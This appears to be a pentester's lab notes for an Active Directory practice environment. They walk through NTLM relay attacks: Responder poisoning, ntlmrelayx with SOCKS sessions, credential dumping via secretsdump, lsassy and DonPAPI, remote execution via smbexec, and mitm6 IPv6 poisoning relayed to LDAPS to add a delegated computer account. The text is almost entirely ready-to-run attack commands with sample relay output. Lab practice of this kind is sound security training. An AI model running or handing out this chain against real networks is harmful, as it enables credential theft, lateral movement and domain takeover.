You finish hashes from responder but not able to crack
check using cme where the smb signing is false
cme smb 192.168.56.10-23 --gen-relay-list relay.txt
cp relay.txt smb_targets.txt
sudo sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='
sudo rm /usr/share/responder/Responder.db
ntlmrelayx.py -tf smb_targets.txt -of netntlm -smb2support -socks
sudo responder -I vboxnet0
socks
Protocol Target Username AdminStatus Port
-------- ------------- ------------------ ----------- ----
SMB 192.168.56.22 NORTH/ROBB.STARK FALSE 445
SMB 192.168.56.22 NORTH/EDDARD.STARK TRUE 445
SMB 192.168.56.23 NORTH/ROBB.STARK FALSE 445
SMB 192.168.56.23 NORTH/EDDARD.STARK FALSE 445
proxychains secretsdump.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22
proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
MITM6 ntlm to ldap
sudo mitm6 -i vboxnet0 -d essos.local -d sevenkingdoms.local -d north.sevenkingdoms.local --debug
ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local --add-computer relayedpccreate --delegate-access